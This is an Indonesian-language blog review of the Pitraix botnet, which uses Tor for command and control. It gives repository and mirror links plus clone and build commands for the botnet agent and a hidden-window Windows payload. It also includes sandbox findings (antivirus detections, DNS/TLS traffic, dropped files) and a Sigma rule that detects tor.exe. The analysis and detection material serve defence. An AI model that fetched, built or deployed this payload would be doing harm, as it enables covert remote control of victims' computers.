Menu

Review Pitraix Botnet: Botnet Over TOR Network

Instalasi

Github:
https://github.com/ThrillQuks/Pitraix [Banned by Github]
https://github.com/sinister66666/Pitraix [Banned by Github]
https://github.com/thezedwards/Pitraix [Still Alive]

Mirror:
https://anonfiles.com/V8jfY473y0/Pitraix-main_2_zip


If you find this project useful you can donate to the respective developer.


Monero: 85HjZpxZngajAEy2123NuXgu1PnNyq2DLSkkr93cyT8QQVae1GruhL4hHAtnaFqeCF7Vo9eW2P11Sig8DDqzVzCSE95NaW6

Bitcoin (segwit): bc1q2dqk9u06vv2j5p6yptj9ex7epfv77sxjygnrnw
git clone https://github.com/thezedwards/Pitraix
cd Pitraix/pitraix
go mod init pitraix

Build Agent

go build OPER.go

Setelah itu akan terbentuk file OPER yang merupakan Agent dari Pitraix Botnet, Pada awal eksekusi file akan menginstall tor dan membuat tor address yang digunakan sebagai jalur komunikasi.

./OPER

Build Payload

Windows:

64Bit:

GOOS=windows go build -ldflags="-s -w -H=windowsgui" lyst_windows.go

32Bit:

GOOS=windows GOARCH=386 go build -ldflags="-s -w -H=windowsgui" -o lyst_windows32.exe lyst_windows.go

setelah itu akan terbentuk file lyst_windows.exe yang akan menjadi payload dalam koneksi antara Agent dan Target

Linux:

Penggunaan

Payload di eksekusi pada perangkat target, nantinya payload akan menginstall tor network dan menjalankan persistence sehingga komputer target terkoneksi melalui jaringan tor ke Agent yang berfungsi sebagai C2 Botnet. Berikut ini tampilan dari Help command Pitraix

Review

Payload terdeteksi sebagai malware oleh Windows Defender.

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Virus:Win32/Wacatac.B!ml&ThreatID=2147774417

Melalui virustotal terdeteksi 17/70 Vendor Antivirus.

https://www.virustotal.com/gui/file/3d9ca72513de1c88b21aa69e5bdfde39bc64aba8818e62b4a945f07fba05178e/detection

Ketika File di Eksekusi

Task Manager

Deteksi C2 Pitraix

Spawn Shell

Shell Execution

Target PC

Network Communication

DNS Resolutions

When executing the file being studied, it performed the following domain name resolutions.apps.identrust.com

  • 23.55.168.144
  • 23.55.168.155

dist.torproject.org

  • 116.202.120.166
  • 38.229.82.35
  • 116.202.120.165
  • 38.229.82.25

ipinfo.io

  • 34.117.59.81

TLS

www.355mg7d4j3do64vidvrmvpy2j.com
Data:
Version: TLS 1.2
Serial Number: 4b57f55ecc1d0a39
Thumbprint: 6a7f37bd7f87f0e54c6d8db9bf760a662368056e
JA3: 140e0f0cad708278ade0984528fe8493
JA3S: 0debd3853f330c574b05e0b6d882dc27
SNI: www.355mg7d4j3do64vidvrmvpy2j.com
Signature Algorithm:
Issuer: CN=www.nzla5b4t6ctmoz7s.com
Subject: CN=www.nzla5b4t6ctmoz7s.com

Files Dropped

C:\Users\user\AppData\Roaming\tor\cached-certs (copy)
C:\Users\user\AppData\Roaming\tor\cached-certs.tmp
C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus (copy)
C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus.tmp
C:\Users\user\AppData\Roaming\tor\cached-microdescs.new
C:\Users\user\AppData\Roaming\tor\state (copy)C:\Users\user\AppData\Roaming\tor\state.tmp
C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus (copy)
C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus.tmp
C:\Windows\Logs\ohsDDO3Nfd1EH3UQD8sVQ1CuM
C:\Windows\security\Olwu9ixeIuV2QdazMcb.zip
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Data\Tor\geoip
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Data\Tor\geoip6
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Olwu9ixeIuV2QdazMcbhid\hostname (copy)
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Olwu9ixeIuV2QdazMcbhid\hostname.tmp
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Olwu9ixeIuV2QdazMcbtorrc
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libcrypto-1_1-x64.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libevent-2-1-7.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libevent_core-2-1-7.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libevent_extra-2-1-7.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libgcc_s_seh-1.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libssl-1_1-x64.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libssp-0.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\libwinpthread-1.dll
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\tor-gencert.exe
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\tor.exe
C:\Windows\security\Olwu9ixeIuV2QdazMcb\Tor\zlib1.dll\Device\Null

PREVENTIF

Untuk default konfigurasi dari Botnet Pitraix dapat dicegah dengan menerapkan RULES untuk memblok eksekusi dengan filename tor.exe.

title: Tor Client or Tor Browser Use
id: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c
status: experimental
description: Detects the use of Tor or Tor-Browser to connect to onion routing networks
references:
    - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
author: frack113
date: 2022/02/20
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: 
            - '\tor.exe'
            - '\Tor Browser\Browser\firefox.exe'
    condition: selection
falsepositives:
    - Unknown
level: high
tags:
    - attack.command_and_control
    - attack.t1090.003